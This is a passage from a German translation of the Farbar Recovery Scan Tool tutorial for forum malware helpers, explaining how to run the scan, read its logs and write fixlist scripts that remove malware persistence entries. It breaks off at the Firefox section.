Farbar Recovery Scan Tool

Download Links für die neueste Version:
Link 1 | Link 2

Farbar Recovery Scan Tool (FRST) ist ein Diagnose- und Fixtool, mit dem man auch skripten kann. Es funktioniert sowohl im normalen als auch im abgesicherten Modus, sowie im Windows Recovery Environment, falls der PC nicht mehr bootet. Dadurch ist es besonders für unbootbare PCs geeignet.

**********************************************************

Tutorial Überblick
Dieses Tutorial wurde ursprünglich von emeraldnzl erstellt, in Zusammenarbeit mit Farbar, dem Autoren des Programms, sowie der Unterstützung von BC (Bleeping Computer) und G2G (Geeks to Go). emeraldnzl ist mittlerweile zurückgetreten und nun wird das Tutorial, unter Absprache mit farbar, von picasso ergänzt und gepflegt. Die Übersetzung ins Deutsche stammt von myrtille. Das Zitieren oder Weiterverbreiten des Tutorials bedarf der Genehmigung von picasso & farbar, sowie von M-K-D-B für die deutsche Übersetzung. Das Tutorial soll den Malware-Helfern in den verschiedenen Foren einen Überblick über die Funktionen des Tools geben.



Weitere Übersetzungen des Tutorials
Englisch (Original)
Französisch
Niederländisch (Niederlande) | Niederländisch (Belgien)
Polnisch
Portugiesisch
Russisch
Spanisch




Inhaltsverzeichnis

1. Einleitung
2. Standard Scan Bereiche
3. Hauptsuchlauf (FRST.txt)
   • Processes (Prozesse)
   • Registry
   • Scheduled Tasks (Geplante Aufgaben)
   • Internet
   • Services (Dienste)
   • Drivers (Treiber)
   • NetSvcs
   • One month (Created/Modified) (Ein Monat (Erstellte/Geänderte))
   • FLock
   • FCheck
   • KnownDLLs
   • SigCheck
   • Association (Verknüpfungen)
   • Restore Points (Wiederherstellungspunkte)
   • Memory info (Speicherinformationen)
   • Drives (Laufwerke) und MBR & Partition Table (MBR & Partitionstabelle)
   • LastRegBack
4. Zusätzlicher Suchlauf (Addition.txt)
   • Accounts (Konten)
   • Security Center (Sicherheits-Center)
   • Installed Programs (Installierte Programme)
   • Custom CLSID (Benutzerdefinierte CLSID)
   • Codecs
   • Shortcuts (Verknüpfungen) und WMI
   • Loaded Modules (Geladene Module)
   • Alternate Data Streams
   • Safe Mode (Abgesicherter Modus)
   • Association (Verknüpfungen)
   • Internet Explorer
   • Hosts content (Hosts Inhalt)
   • Other Areas (Andere Bereiche)
   • MSCONFIG/TASK MANAGER disabled items (MSCONFIG/TASK MANAGER Deaktivierte Einträge)
   • FirewallRules (Firewall Regeln)
   • Restore Points (Wiederherstellungspunkte)
   • Faulty Device Manager Devices (Fehlerhafte Geräte im Gerätemanager)
   • Event log errors (Fehlereinträge in der Ereignisanzeige)
   • Memory info (Speicherinformationen)
   • Drives (Laufwerke)
   • MBR & Partition Table (MBR & Partitionstabelle)
5. Weitere optionale Suchläufe
   • List BCD (BCD auflisten)
   • SigCheckExt
   • Shortcut.txt
   • 90 Days Files (Dateiliste 90 Tage)
   • Search Files (Datei-Suche)
   • Search Registry (Registry-Suche)
6. Befehle und Beispiele
   • CloseProcesses:
   • CMD:
   • Comment:
   • Copy:
   • CreateDummy:
   • CreateRestorePoint:
   • DeleteJunctionsInDirectory:
   • DeleteKey: und DeleteValue:
   • DeleteQuarantine:
   • DisableService:
   • EmptyEventLogs:
   • EmptyTemp:
   • ExportKey: und ExportValue:
   • File:
   • FilesInDirectory: und Folder:
   • FindFolder:
   • Hosts:
   • ListPermissions:
   • Move:
   • Powershell:
   • Reboot:
   • Reg:
   • RemoveDirectory:
   • RemoveProxy:
   • Replace:
   • RestoreFromBackup:
   • RestoreMbr:
   • RestoreQuarantine:
   • SaveMbr:
   • SetDefaultFilePermissions:
   • StartBatch: — EndBatch:
   • StartPowershell: — EndPowershell:
   • StartRegedit: — EndRegedit:
   • Symlink:
   • SystemRestore:
   • TasksDetails:
   • testsigning on:
   • Unlock:
   • Virusscan:
   • Zip:
7. Bausteine
   

Vertrauenswürdige Helfer und Experten, die über den erforderlichen Zugang verfügen, können sich im FRST-Diskussionsthread über die neuesten Tool-Entwicklungen auf dem Laufenden halten.

Einleitung

FSRTs Stärke ist seine einfache Handhabung. Es wurde mit einem besonderen Augenmerk auf Benutzerfreundlichkeit entwickelt: Einzelne Zeilen, die malwarebezogen sind, können direkt aus dem Log in einen Editor kopiert werden, um einen Fix zu erstellen. Dieses gespeicherte Fixskript wird dann automatisch von FRST eingelesen beim Fixen.



Kompatibilität
Farbar Recovery Scan Tool funktioniert unter Windows XP, Windows Vista, Windows 7, Windows 8, Windows 10 und Windows 11, sowohl bei 32-bit als auch bei 64-bit Versionen. FRST funktioniert nicht auf XP 64bit.



Handhabung
FRST erstellt ein Log, in dem die für Malwareanalyse relevanten Bereiche von Windows aufgelistet werden, sowie einige grundlegende Informationen über den Rechner.
Da das Tool ständig weiterentwickelt wird, insbesondere im Hinblick auf das Erkennen neuer Malware, ist es äußerst empfehlenswert, es regelmäßig zu aktualisieren, auch während einer Bereinigung. Sollte der Rechner mit dem Internet verbunden sein, wird FRST automatisch nach Updates suchen, wenn es ausgeführt wird. Wird eine Aktualisierung gefunden, erscheint ein Popup und der User hat dann die Möglichkeit, diese zu installieren.

Normalerweise filtert FRST bekannte gutartige Einträge aus den Logs heraus. Dies wird getan, um die Logs so kurz wie möglich zu machen. Wenn man das komplette Log sehen will, muss man entsprechend by Ausnahmen die Haken entfernen.

• FRST filtert alle Standard MS-Einträge..
• FRST filtert alle Standard MS-Dienste und Treiber, sowie bekannte, gutartige Dienste & Treiber.
• Signierte, ausführbare Microsoft-Dateien werden in der Sektion "Ein Monat (Erstellte)" gefiltert.
• Signed Microsoft executables are whitelisted on the "One month (created)" list.
• Einträge, die keine signierten Dateien aufweisen, werden nicht gefiltert.
• Dienste und Treiber von Sicherheitsprogrammen (Firewall, Antivirus) werden immer angezeigt
• Sämtliche SPTD-bezognenen Treiber werden immer angezeigt.

Vorbereitungen
FRST braucht Admin-Rechte, um ein zuverläßiges Log zu erstellen und sollte daher immer mit den entsprechenden Rechten ausgeführt werden. Wird FRST mit eingeschränkten Rechten ausgeführt, erscheint eine entsprechende Warnung im Header des Logs. Es ist dann empfehlenswert, den Scan mit Admin-Rechten zu wiederholen.

Gelegentlich wird FRST von Sicherheitsprogrammen behindert. Es passiert nicht häufig, sollte aber im Hinterkopf behalten werden. Während des Scans treten normalerweise keine Probleme auf, aber es ist emfohlen, Sicherheitsprogramme, die die Bereinigung behindern könnten (wie z.B. Comodo), vor einem Fix zu deaktivieren.

Ganz allgemein wird bei Rootkits empfohlen, einen Befall nach dem andern abzuarbeiten und nicht alles gleichzeitig.

Es ist nicht notwendig, ein Registry Backup zu erstellen, denn FRST erstellt sein eigenes Backup bei der ersten Ausführung. Das Backup befindet sich in %SystemDrive%\FRST\Hives (In den meisten Fällen ist das C:\FRST\Hives). Für weitere Informationen siehe dazu den Befehl RestoreFromBackup: .

FRST gibt es in einer Reihe von verschiedenen Sprachen. Sollte das Log in einer Sprache sein, die nicht einfach zu entziffern ist, gibt es die Möglichkeit das Log auf Englisch ausgeben zu lassen. Wenn also der Helfer oder der TO die Logs auf Englisch haben möchte, genügt es dem Dateinamen von FRST das Wort "English" bei zu fügen. Zum Beispiel EnglishFRST.exe oder FRST64English.exe. Das Log wird dann auf Englisch erstellt. (Dies gilt nur für English, nicht für andere Sprachen)



FRST ausführen
Der TO wird angewiesen, FRST auf seinen Desktop herunterzuladen. Dann muss er nur noch das Programm per Doppelklick ausführen und den Disclaimer akzeptieren. Das FRST-Icon sieht wie folgt aus:

Wichtiger Hinweis: Es gibt eine 32-bit und eine 64-bit Version. Die FRST-Version muss mit dem System des TO kompatibel sein. Sollte es unklar sein, welche Version der TO braucht, dann kann er beide Versionen herunterladen und versuchen, sie auszuführen. Nur eine der beiden Versionen wird sich ausführen lassen. Das ist dann die richtige.


Das User-Interface von FRST sieht dann folgendermaßen aus:

Wenn FRST fertig ist, speichert es die Logs in dem Ordner in dem es ausgeführt wurde. Beim Ausführen erstellt FRST (außerhalb der Recovery Environment) automatisch zwei Logs: FRST.txt und Addition.txt.
Zudem werden Kopien der Logs in %systemdrive%\FRST\Logs gespeichert (In den meisten Fällen ist das C:\FRST\Logs).



Reparaturen

Vorsicht, sehr wichtiger Hinweis: Farbar Recovery Scan Tool ist ein nicht-invasises Programm und kann keinen Schaden am Computer verursachen. Beim Reparieren wird FRST jedoch versuchen, so gut wie möglich die aufgeführten Einträge zu löschen. Es gibt zwar ein paar Sicherheitsnetze, jedoch nicht genug um alle unbedachten Löschaktionen abzufangen. Der Nutzer muss daher selbst darauf achten, dass sein Skript den Rechner nicht schadet. Falsche Handhabung (das Löschen von Systemdateien z. B.) kann den Rechner unbootbar machen.

Wenn es Zweifel gibt, fragt einen Experten im Forum bevor ihr etwas entfernen möchtet.

FRST hat eine Reihe von Befehlen und Parametern, mit denen Prozesse und Probleme identifiziert und behandelt werden können.



Vorbereiten der fixlist
1. Methode: fixlist.txt
Um die identifizierten Einträge zu entfernen, kopiert man die entsprechenden Zeilen from FRST Protokoll und fügt sie in ein Textdokument mit dem Namen fixlist.txt ein. Diese fixlist.txt muss sich im selben Verzeichnis wie das Programm FRST befinden.

Wichtiger Hinweis:
Es ist wichtig, dass man Notepad verwendet! Word oder andere Programme fügen den Dateien weitere Informationen hinzu, die FRST nicht verarbeiten kann.

2. Methode: STRG + y
Wurde FRST gestartet, so kann man durch Drücken der Tastenkombination "STRG + y" automatisch ein leeres Textdokument öffnen. Starte FRST, drücke "STRG + y", um die Datei zu öffnen, füge den Fix ein, drücke "STRG + s" um die Datei zu speichern.

3. Methode: Zwischenablage
Die zu entfernden Zeilen werden zwischen Start:: und End:: kopiert. Das sieht dann so aus:

Zitat:

Start::
Scriptinhalt
End::

Nun kopiert man den kompletten Inhalt ( inklusive Start:: und End:: ) und drückt auf den Button Reparieren.



__________________________________________________________________________________

Unicode
Um Einträge mit Unicode Symbolen entfernen zu können, muss das Script im Unicode Format abgespeichert werden, andernfalls wird der Fix nicht funktionieren. Die Tastenkombination "STRG+y" speichert die Textdatei automaitsch im Unicode Format. Wenn man die fixlist.txt manuell erstellt hat, muss man bei der Codierung eine andere Einstellung vornehmen (siehe unten).

Beispiel:

Zitat:

S2 楗敳潂瑯獁楳瑳湡t; 㩃停潲牧浡䘠汩獥⠠㡸⤶坜獩履楗敳䌠牡⁥㘳尵潂瑯楔敭攮數 [X]
ShortcutWithArgument: C:\Users\Public\Desktop\Gооglе Сhrоmе.lnk -> C:\Users\User\AppData\Roaming\HPRewriter2\RewRun3.exe (QIIXU APZEDEEMFA) -> 1 0 <===== Cyrillic
2016-08-17 14:47 - 2016-08-17 16:23 - 00000000 _____ C:\ProgramData\Ｇooｇle Ｃhroｍe.lnk.bat

Kopiere die Einträge in ein leeres Textdokument, wähle Datei > Speichern Unter und wähle unter Codierung UTF-8 aus, benenne die Datei in fixlist.txt und klicke auf Speichern.

Wenn du UTF-8 nicht auswählst, wird dir der Texteditor eine Warnung ausgeben. Ignorierst du diese, erhälst du folgendes:

Zitat:

S2 ????????t; ??????????????????????????? [X]
C:\Users\Public\Desktop\G??gl? ?hr?m?.lnk
2016-08-17 14:47 - 2016-08-17 16:23 - 00000000 _____ C:\ProgramData\Google Chrome.lnk.bat

FRST wird die Einträge daraufhin nicht entfernen können.

__________________________________________________________________________________

Manipulierte Benutzernamen
Einige Benutzer verändern Logdateien, indem sie ihren Benutzernamen entfernen oder ersetzen. Um sicher zu stellen, dass die korrekten Pfaden bearbeitet werden, kann man die potentiell manipulierten Benutzernamen in den jeweiligen Pfaden mit CurrentUserName (für den aktuell angemeldeten Benutzer) oder AllUserName (für alle Benutzer) ersetzen. FRST wird die Schlüsselwörter automatisch durch den/die korrekten Benutzernamen ersetzen.

Wichtiger Hinweis: CurrentUserName wird in der Recovery Environment nicht unterstützt.
__________________________________________________________________________________


Um zu verhindern, dass FRST aufgrund falscher Skripte stundenlang hängen bleibt, ist die Ausführungszeit der CMD: und Powershell: Befehle auf 60 Minuten begrenzt.

Einträge, die von FRST behoben werden, werden nach %systemdrive%\FRST\Quarantine verschoben (In den meisten Fällen ist das C:\FRST\Quarantine). Der Ordner bleibt solange auf dem Computer, bis er am Ende der Bereinigung entfernt wird.

Mehr Details findet man in den folgenden Beiträgen.



Entfernung von FRST
Um automatisch das Programm selbst und alle Dateien/Ordner, die von FRST erzeugt wurden, entfernen zu können, muss man die Datei FRST/FRST64.exe in uninstall.exe umbenennen und starten.
Die Prozedur benötigt einen Neustart und funktioniert nur außerhalb der Recovery Environment.

Standard-Scanbereiche

Beim ersten und jedem weiteren Suchlauf außerhalb der Recovery Environment erstellt FRST zwei Logs: FRST.txt und Addition.txt. Addition.txt wird nicht erstellt, wenn FRST im Recovery Environment ausgführt wurde.


Suchläufe im normalen Modus:

Hauptsuchlauf
Processes (Prozesse) [Überprüfung digitaler Signaturen]
Registry [Überprüfung digitaler Signaturen]
Scheduled Tasks (Geplante Aufgaben) [Überprüfung digitaler Signaturen]
Internet [Überprüfung digitaler Signaturen]
Services (Dienste) [Überprüfung digitaler Signaturen]
Drivers (Treiber) [Überprüfung digitaler Signaturen]
NetSvcs
One month (Created) (Ein Monat (Erstellte)) [Überprüfung digitaler Signaturen von Microsoft]
One month (Modified) (Ein Monat (Geänderte))
Files in the root of some directories (Dateien im Wurzelverzeichnis einiger Verzeichnisse)
FLock
FCheck
SigCheck [Überprüfung digitaler Signaturen]
LastRegBack



Zusätzlicher Suchlauf
Accounts (Konten)
Security Center (Sicherheits-Center)
Installed Programs (Installierte Programme)
Custom CLSID (Benutzerdefinierte CLSID) [Überprüfung digitaler Signaturen]
Codecs [Überprüfung digitaler Signaturen]
Shortcuts (Verknüpfungen) und WMI
Loaded Modules (Geladene Module) [Überprüfung digitaler Signaturen]
Alternate Data Streams
Safe Mode (Abgesicherter Modus)
Association (Verknüpfungen)
Internet Explorer [Überprüfung digitaler Signaturen]
Hosts content (Hosts Inhalt)
Other Areas (Andere Bereiche)
MSCONFIG/TASK MANAGER disabled items (MSCONFIG/TASK MANAGER Deaktivierte Einträge)
FirewallRules (Firewall Regeln) [Überprüfung digitaler Signaturen]
Restore Points (Wiederherstellungspunkte)
Faulty Device Manager Devices (Fehlerhafte Geräte im Gerätemanager)
Event log errors (Fehlereinträge in der Ereignisanzeige)
Memory info (Speicherinformationen)
Drives (Laufwerke)
MBR & Partition Table (MBR & Partitionstabelle)



Optionale Suchläufe
List BCD (BCD auflisten)
SigCheckExt [Überprüfung digitaler Signaturen]
Shortcut.txt
Addition.txt
90 Days Files (Dateiliste 90 Tage)

Search Files (Datei-Suche) [Überprüfung digitaler Signaturen]
Search Registry (Registry-Suche)

Wichtiger Hinweis: [Datei nicht signiert] wird für Dateien angezigt, die entweder keine digitale Signatur oder keine verifizierte Signatur besitzen.



Suchläufe im Recovery Environment:

Hauptsuchlauf
Registry
Scheduled Tasks (Geplante Aufgaben)
Services (Dienste)
Drivers (Treiber)
NetSvcs
One month (Created) (Ein Monat (Erstellte))
One month (Modified) (Ein Monat (Geänderte))
KnownDLLs
SigCheck
Association (Verknüpfungen)
Restore Points (Wiederherstellungspunkte)
Memory info (Speicherinformationen)
Drives (Laufwerke)
MBR & Partition Table (MBR & Partitionstabelle)
LastRegBack



Optionale Suchläufe
List BCD (BCD auflisten)
90 Days Files (Dateiliste 90 Tage)

Search Files (Datei-Suche)


Wichtiger Hinweis: Die Überprüfung digitaler Signaturen ist in dier Wiederherstellungsumgebung nicht verfügbar.

Hauptsuchlauf (FRST.txt)

Header
Hier ist ein Beispiel-Header:

Code: Alles auswählenAufklappen

ATTFilter

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 09-09-2023
durchgeführt von M-K-D-B (Administrator) auf NOTEBOOK (Acer Aspire E5-575G) (10-09-2023 13:11:58)
Gestartet von C:\Users\M-K-D-B\Desktop\FRST3264.exe
Geladene Profile: M-K-D-B
Plattform: Microsoft Windows 10 Home Version 22H2 19045.3393 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: FF
Start-Modus: Normal
         

Es ist wichtig, den Header durchzuschauen:

Die erste Zeile identifiziert das Betriebssystem als 32- oder 64-bit. Die FRST Version wird auch aufgeführt, damit man leicht veraltete Versionen von FRST erkennen und aktualisieren kann. Ältere Versionen können zum Teil bestimmte Befälle nicht erkennen oder bereinigen.

In der zweiten Zeile sieht man, welcher User das Programm ausgeführt hat und mit welchen Rechten. Dies kann dich hinweisen, ob ein User die notwendigen Rechte besitzt. Die Zeile gibt auch den Computernamen zusammen mit dem Systemhersteller und dem Modell (falls verfügbar) an. Das Datum und die Uhrzeit, zu der das Tool ausgeführt wurde, ist hilfreich, um ein altes Protokoll zu erkennen, das versehentlich von einem Benutzer bereitgestellt wurde.

Die dritte Zeile zeigt, in welchem Ordner FRST ausgeführt wurde. Das kann wichtig sein, wenn man dem User einen Fix geben will, der ja im selben Ordner wie FRST.exe selbst liegen muss.

In der vierten Zeile wird angegeben, unter welchem ​​Konto (Profil) der Benutzer angemeldet ist, d. h. unter den geladenen Benutzer-Hives (ntuser.dat und UsrClass.dat).

Wichtiger Hinweis: Wenn mehr als ein Benutzerprofil geladen ist (z. B. wenn jemand den Account gewechselt hat, statt sich auszuloggen und neueinzuloggen), so führt FRST die Einträge aller geladenen Profile und ihrer Registryeinträge auf. Andere nicht geladene Konten werden nicht unter "Geladene Profile" aufgeführt, FRST stellt jedoch automatisch passende Hives (nur ntuser.dat) für den Registrierungsscan bereit.

Die fünfte Zeile gibt die Edition von Windows auf dem Computer inklusive größere Updates (Version und OS Build unter Windows 11 und Windows 10, "Update" unter Windows 8.1, Service Pack unter Windows 7 und älter) und das installierte Sprachpaket an. Dies sollte dich auf ein Problem mit en Updates hinweisen, wenn die Updates nicht aktuell sind.

Die sechste Zeile zeigt den Standardbrowser an.

Die siebte Zeile zeigt an, in welchem Modus der Scan ausgeführt wurde.

Danach folgt ein Link zu der englischen Anleitung von FRST.

Wichtiger Hinweis: Die Informationen im Kopf, die man beim Suchlauf in der Recovery Environment erhält, sind ähnlich. Es wird nur etwas verkürzt dargestellt, da die Benutzerprofile nicht geladen sind.



Warnungen, die im Header erscheinen können:
Wenn der PC nicht bootet und FRST die Warnung "Achtung: System Hive konnte nicht geladen werden" zeigt, kann der System-Schlüssel in der Registry fehlen. In solchen Fällen kann es helfen, den Schlüssel mithilfe eines Backups unter Verwendungs des Befehls LastRegBack: wiederherzustellen (siehe weiter unten).


"Standard: Controlset001" - Weniger eine Warnung als die Information, welches Controlset das Standardcontrolset des Systems ist. Diese Information is immer dann wichtig, wenn man das Controlset zum Auslesen oder Modifizieren imRecovery Environment ansprechen will. Das aktuelle ControlSet ist das einzige, das von Windows während des Bootens eingelesen wird.



Processes (Prozesse)

Zitat:

(cmd.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <8>

Falls ein Prozess von einem anderen Prozess ausgeführt wird, wird der (Elternprozess ->) aufgelistet.

Die <Nummer> , die am Ende einer jeden Zeile hinzugefügt wird, zeigt mehrere Instanzen desselben Prozesses an.

Es gibt zwei Gründe, einen Prozess stoppen zu wollen. Zum einen kann es sein, dass du ein legitimes Programm deaktivieren willst, damit es den Fix nicht behindert. Zum andern kann es sein, dass du einen bösartigen Prozess stoppen und die dazugehörige Datei oder den Ordner löschen willst.

Um einen Prozess zu stoppen, füge die entsprechenden Zeilen aus dem FRST-Scan ein.

Die Datei Fixlog.txt wird erstellt mit dem Eintrag des Prozessnamens gefolgt von

Zitat:

=> Prozess erfolgreich geschlossen

Falls es sich um einen bösartigen Prozess handelt, bei der man die Datei auch löschen will, muss man die Datei (oder den Ordner) separat aufführen.



Registry

FRST besitzt eine mächtige Löschroutine, die auch Schlüssel und Werte ohne Zugriffsrechte oder mit eingebetteten NULL-Charaktern löschen kann. Schlüssel und Werte, die FRST nicht auf Anhieb löschen kann, werden beim geplanten Neustart erneut einer Löschroutine unterzogen. Die einzigen Schlüssel bzw. Werte, die FRST nicht auf Anhieb löschen kann, sind Schlüssel bzw. Werte die von einem Treiber geschützt werden. In solchen Fällen sollte erst der Treiber und anschließend die Registry-Einträge gelöscht werden.

Wenn man einen Registry-Schlüssel/Wert aus dem Log in den Fix kopiert, führt FRST eine der folgenden beiden Handlungen aus:

1. Es erstellt den Standardwert des Schlüssels/Wertes wieder her oder
2. Es löscht den Schlüssel/Wert.

Wenn die in die fixlist kopierten Eintrage zu einem der Bereiche BootExecute, Winlogon-Werte (Userinit, Shell, System), LSA und AppInit_DLLs gehören, werden sie auf die Standard Windows-Werte zurückgesetzt.

Wichtiger Hinweis:
Wenn man einen bösartigen Pfad aus dem AppInit_DLLs Wert löschen lässt, bleiben die anderen Pfade in AppInit_DLLs erhalten und werden nicht angerührt.


Man braucht keine Batch oder Regfix zu erstellen. Dasselbe ist auch für andere wichtige Schlüssel/Werte wahr, die von Malware missbraucht werden können.

Wichtiger Hinweis:
FRST rührt die Dateien, die von den Registryeinträgen geladen werden, nicht an. Diese Dateien müssen separat entfernt werden, indem man ihren kompletten Pfad angibt, ohne weitere Infos.

Run, RunOnce, Image File Execution Options und andere Registry Einträge werden aus der Registry gelöscht, wenn sie in der fixlist stehen. Die von dem Registryeintrag geladenen Dateien werden nicht entfernt und müssen separat aufgeführt werden:

Zitat:

HKLM\...\RunOnce: [LT1] => C:\WINDOWS\TEMP\gA652.tmp.exe [216064 2019-04-13] () [Datei ist nicht signiert] <==== ACHTUNG
C:\WINDOWS\TEMP\gA652.tmp.exe

Wenn eine Datei oder eine Verknüpfung im Startup Ordner gefunden wird, führt FRST die Datei in der Rubrik Startup: auf. Wenn die Datei eine Verknüpfung ist, wird in der nächsten Zeile die Zieldatei, auf die die Verknüpfung verweist, angezeigt (also die Datei, die von der Verknüpfung aufgerufen wird). Um beide Dateien zu entfernen, müssen auch beide Dateien (die Verknüpfung und die Zieldatei) in die fixlist kopiert werden.
Beispiel:

Zitat:

Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helper.lnk [2019-03-25]
ShortcutTarget: helper.lnk -> C:\Users\User\AppData\Roaming\WindowsServices\helper.vbs () [Datei ist nicht signiert]

Wichtiger Hinweis: Die erste Zeile entfernt nur die Verknüpfung. Die zweite Zeile entfernt nur die helper.vbs. Wenn man also nur die zweite Zeile mit der ausführbaren Datei aufführt, wird nur die ausführbare Datei entfernt und die Verknüpfung bleibt im Startup-Ordner. Beim nächsten Neustart wird es dann eine Fehlermeldung geben, wenn die Verknüpfung die Datei auszuführen versucht und diese nicht findet.

FRST erkennt umgeleitete Startup-Ordner (pro Benutzer und pro System).
Beispiel:

Zitat:

StartupDir: C:\Users\User\AppData\Local\Temp\b64c58644b\ <==== ACHTUNG

Um das Problem zu beheben, fügt man den Eintrag in die fixlist ein und FRST stellt den Standardpfad wieder her.


Wenn Malware nicht vertrauenswürdige Zertifikate (Untrusted Certificates) oder Richtlinien zur Beschränkung von Software (Software Restriction Policies) einsetzt, findet man beispielsweise folgende Einträge:

Zitat:

HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ACHTUNG

Zitat:

HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ACHTUNG

Um die Blockierung der Antivirenprogramme aufzuheben, muss man nur die entsprechenden Zeilen in die fixlist einfügen.

Wichtiger Hinweis: Die Erkennung von Gruppenrichtlinien ist generisch. Es ist möglich, dass andere legitime Einträge erstellt werden, um das System vor Schadsoftware zu schützen.
Mehr dazu hier: How to manually create Software Restriction Policies to block ransomware


FRST erkennt auch das Vorhandensein von Gruppenrichtlinien (Group Policy Objects), (Registry.pol und Skripts), was von Malware missbraucht werden kann. Firefox, Google Chrome, Edge und Windows Defender Richtlinien in der Datei registry.pol werden individuell aufgelistet:

Zitat:

GroupPolicy: Beschränkung - Windows Defender <======= ACHTUNG

Für andere Richtlinien oder Skripte erhält man nur eine generische Mitteilung ohne Details:

Zitat:

GroupPolicy: Beschränkung ? <======= ACHTUNG
GroupPolicyScripts: Beschränkung <======= ACHTUNG

Um die Richtlinien wiederherzustellen, fügt man die Einträge in die fixlist ein. FRST wird die GroupPolicy-Ordner bereinigen und einen Neustart durchführen.
Beispiel:

Zitat:

C:\Windows\system32\GroupPolicy\Machine => erfolgreich verschoben
C:\Windows\system32\GroupPolicy\GPT.ini => erfolgreich verschoben

Wichtiger Hinweis: Die Erkennung ist für einen Standad Heimcomputer, auf dem sich normalerweise keine Richtlinien befinden, ausgelegt. Daher kann es sein, dass legitime Einträge angezeigt werden, die über gpedit.msc hinzugefügt wurden.



Scheduled Tasks (Geplante Aufgaben)
Wenn ein derartiger Eintrag in die fixlist eingefügt wird, wird der geplante Task entfernt.

Zitat:

Task: {A0DC62F9-8007-4B9C-AAA2-0AB779246E27} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4925952 2019-03-19] () [Datei ist nicht signiert] <==== ACHTUNG

Zitat:

"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A0DC62F9-8007-4B9C-AAA2-0AB779246E27}" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A0DC62F9-8007-4B9C-AAA2-0AB779246E27}" => erfolgreich entfernt
C:\Windows\System32\Tasks\csrss => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => erfolgreich entfernt

FRST entfernt die relevanten Registry-Einträge, sowie die Datei des geplanten Tasks, jedoch nicht die ausgeführte Datei. Wenn diese Datei bösartig ist, sollte sie zusätzlich in die fixlist kopiert werden, um diese zu löschen.

Wichtiger Hinweis: Malware kann durchaus die Namen legitimer Prozesse benutzen (z.B. kann es sc.exe nutzen, um seinen Dienst auszuführen), um sich selbst auszuführen. In anderen Worten: Stellt sicher, dass die Datei, die gelöscht werden soll, bösartig ist.


Die folgende Zeile sollte nicht in die fixlist eingefügt werden:

Zitat:

"{Zufällige GUID}" => Schlüssel wurde entsperrt. <==== ACHTUNG

Diese Nachricht weist darauf hin, dass FRST zerstörte Berechtigungen erkannt und automatisch während des Suchlaufs behoben hat. Ein neues Logfile sollte angefordert werden, um zu überprüfen, ob der entsperrte Task sichtbar (benutzerdefinierte Aufgabe) oder nicht (whitelisted Microsoft-Eintrag). Wenn notwendig, kann die standard Taskzeile in die fixlist aufgenommen werden.



Internet
In den meisten Fällen werden Einträge, die in die fixlist kopiert werden, entfernt. Für Registry Einträge, in denen Dateien oder Ordner vorkommen, müssen die Dateien/Ordner extra in den Fix kopiert werden. Dies bezieht sich allerdings nicht auf Browser-Einträge, siehe dazu die Beschreibungen weiten unten für weitere Details.



Winsock
Wenn ein Catalog5 Eintrag, der entfernt werden soll, aufgelistet wird, so wird FRST eines der folgenden zwei Dinge tun:

1) Im Falle eines veränderten Eintrags wird der Standardwert wiederhergestellt.
2) Im Falle eines neuerstellten Eintrags wird dieser gelöscht und die Catalog-Einträge neu durchnummeriert.

Wenn es um Catalog9 Einträge geht, dann sollte besser der Befehl "netsh winsock reset" benutzt werden:

Zitat:

cmd: netsh winsock reset

Sollten danach weiterhin benutzerdefinierte Catalog9 -Einträge existieren, können diese in die fixlist aufgenommen werden. FRST wird dann die Einträge löschen und den Katalog neudurchnummerieren.

Wichtiger Hinweis: Eine beschädigte Winsock-Kette wird den Rechner vom Internet trennen.

Eine beschädigte Winsock-Kette sieht wie folgt aus:

Zitat:

Winsock: -> Catalog5 - Unterbrochene Internetverbindung aufgrund eines fehlenden Eintrages. <===== ACHTUNG
Winsock: -> Catalog9 - Unterbrochene Internetverbindung aufgrund eines fehlenden Eintrages. <===== ACHTUNG

Um diese zu reparieren, kann man die Einträge in die fixlist kopieren.



hosts
Wenn in der Hosts benutzerspezifische Einträge vorhanden sind, sieht man in der Internet-Rubrik des FRST.txt folgenden Eintrag:

Zitat:

Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt

Falls die Hosts-Datei nicht gefunden wird, wird FRST dies ebenfalls vermerken.
Um die hosts-Datei zurückzusetzen, reicht es, den Eintrag in die fixlist zu kopieren. Das erfolgreiche Zurücksetzen der hosts-Datei wird im fixlog.txt vermerkt.



Tcpip und weitere Einträge
Tcpip und andere Einträge werden, wenn sie in die fixlist eingefügt werden, gelöscht.

Wichtiger Hinweis: DNS Server, die in der Registrierungsdatenbank (DhcpNameServer und NameServer) konfiguriert sind, können mit dem "DNS servers" Suchlauf in Addition.txt vergleichen werden, um zu Überprüfen, welche Einstellung aktiv ist.

Wichtiger Hinweis: Im Falle der StartMenuInternet-Einträge tauchen die Standardwerte nicht auf, sie sind in einer Whitelist. Wenn der Eintrag im FRST Log erscheint, so bedeutet das, dass ein nicht-standard Pfad angezeigt wird. Es kann oder aber auch nicht sein, dass etwas mit dem Pfad in der Registry nicht stimmt. Evtl. sind weitere Recherchen notwendig. Der Eintrag kann in die fixlist kopiert werden und wird dann auf den Standardwert zurückgesetzt.

Wichtiger Hinweis: Bei Erweiterungen, die nicht über die offiziellen Repositorien (Chrome Web Store, Firefox Add-ons, Microsoft Edge Addons und Opera add-ons) installiert wurden, wird eine Update url erkannt.



Edge
Unter Windows 10 werden beide Versionen des Browsers erkannt und zusammen in der Logdatei aufgelistet.

Klasschischer Edge: Außer DownloadDir können alle Zeilen in die fixlist aufgenommen werden. Die Elemente werden gelöscht.

Chromium-basierter Edge: Es gelten die gleichen Regeln wie für Google Chrome. Siehe dazu die Beschreibung unten.



Firefox
